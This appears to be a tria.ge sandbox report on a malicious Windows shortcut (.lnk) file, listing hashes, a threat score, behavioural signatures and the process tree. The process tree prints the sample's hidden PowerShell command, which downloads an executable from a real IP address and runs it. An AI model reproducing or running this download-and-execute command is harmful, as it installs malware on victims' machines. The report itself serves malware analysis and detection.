Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
15/01/2025, 08:35
Static task
static1
Behavioral task
behavioral1
Sample
SCN-00120258988.lnk
Resource
win7-20240903-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
SCN-00120258988.lnk
Resource
win10v2004-20241007-en
28 signatures
150 seconds
General
-
Target
SCN-00120258988.lnk
-
Size
2KB
-
MD5
d2f8a24574b8dfff091aceedcbe7422d
-
SHA1
40653d02667f7cbfe38682e131670ee9e13efed2
-
SHA256
3739246e4eef28e6ed8fc6c4ffde9a9d746632756976f08cf6fe14dad8f4b99f
-
SHA512
601b21884e9b6bf801fa9a12e94a688f38aa5dadc1ba6fbdb9ffdb9d078bc8180ebf18fc4bee86890fa34050fef7431550d669810312437154530e0ef97fbc46
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2688 powershell.exe 2688 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2688 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2688 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3060 wrote to memory of 2688 3060 cmd.exe 31 PID 3060 wrote to memory of 2688 3060 cmd.exe 31 PID 3060 wrote to memory of 2688 3060 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\SCN-00120258988.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://147.124.216.113/albt.exe -OutFile C:\Users\Admin\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\Admin\AppData\Local\Temp\file.exe' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688
-